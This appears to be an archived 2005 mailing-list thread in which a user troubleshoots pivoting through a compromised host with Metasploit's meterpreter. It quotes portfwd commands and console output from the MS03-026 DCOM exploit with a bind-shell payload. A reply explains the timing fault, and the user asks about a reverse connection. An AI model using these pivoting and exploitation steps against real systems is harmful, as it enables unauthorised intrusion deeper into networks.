use of meterpreter (copy for the list )

[thomas.werth at vahle.de (Thomas Werth)]

mmiller at hick.org schrieb:
> On Fri, Apr 15, 2005 at 08:58:06AM +0200, Thomas Werth wrote:
>
> > Just took a second try, but i'm still doing something wrong :(
> > Here's "the log" :
> >
> > 1. Hacking "proxy Host"
> > 2. setting up portforwarding
> > meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 'NextTargetIP' -p 135
> > portfwd: Successfully created local listener on port 9000.
> > meterpreter> portfwd -a -L 127.0.0.1 -l 5555 -h 'NextTargetIP' -p 5555
> > portfwd: Successfully created local listener on port 5555.
> > meterpreter> portfwd -v
> > Local port forward listeners:
> >
> >  127.0.0.1:9000 <-> 'NextTargetIP':135
> >  127.0.0.1:5555 <-> 'NextTargetIP':5555
> > 3. Launching another instance of metasploit and prepare next exploit
> >
> > Exploit and Payload Options
> > ===========================
> >
> >  Exploit:    Name      Default      Description
> >  --------    ------    ---------    ------------------
> >  required    RHOST     127.0.0.1    The target address
> >  required    RPORT     9000         The target port
> >
> >  Payload:    Name        Default    Description
> >  --------    --------    -------
> > ------------------------------------------
> >  required    EXITFUNC    thread     Exit technique: "process",
> > "thread", "seh"
> >  required    LPORT       5555       Listening port for bind shell
> >
> >  Target: Windows NT SP6/2K/XP/2K3 ALL
> >
> > msf msrpc_dcom_ms03_026(win32_bind) > exploit
> > [*] Starting Bind Handler.
> > [*] Got connection from 127.0.0.1:32772 <-> 127.0.0.1:5555
> >
> > [*] Exiting Bind Handler.
> >
> > maybe i setup proxy for listen Port wrong or something else ?
> > What do i have to fix ?
>
>
> My guess is that what's happening is the bind handler is establishing
> the connection before you've finished exploiting the host.  What I'd
> recommend doing is waiting a few seconds to create the port 5555 port
> forward until after the exploit should have completed.  Once it has,
> create the port forward on port 5555 and the bind handler should
> establish its connection.  Right now this is all kind of kludgey because
> it isn't really fully integrated (more of a prototype), but it should
> work.  What's happening right now is the bind handler is establishing
> the connection to port 5555 immediately (before the exploit even takes
> place) which then instructs the meterpreter server to connect to the
> target host on port 5555.  Since the exploit hasn't finished, the target
> host isn't listening on port 5555 and thus the meterpreter server
> returns a failure indication to the client which causes it to close its
> half of the port forward for that connection (thus why the bind handler
> exits).

just tried that out, startet exploit set portfwd right after
[*] Connected to REMACT with group ID 0xef52
is shown, but still no luck :(
Would it be better to do a reverse bind ?
How would i set this up ?
For Example :
When using LPort 7777 and LHost = Proxy Host
I can't setup a portforwad that routs to localhost 7777, cause then
exploit fails with error msg :
Error: Could not start listener: Address already in use

It's really important to me getting this working. What can i do to get
this working ?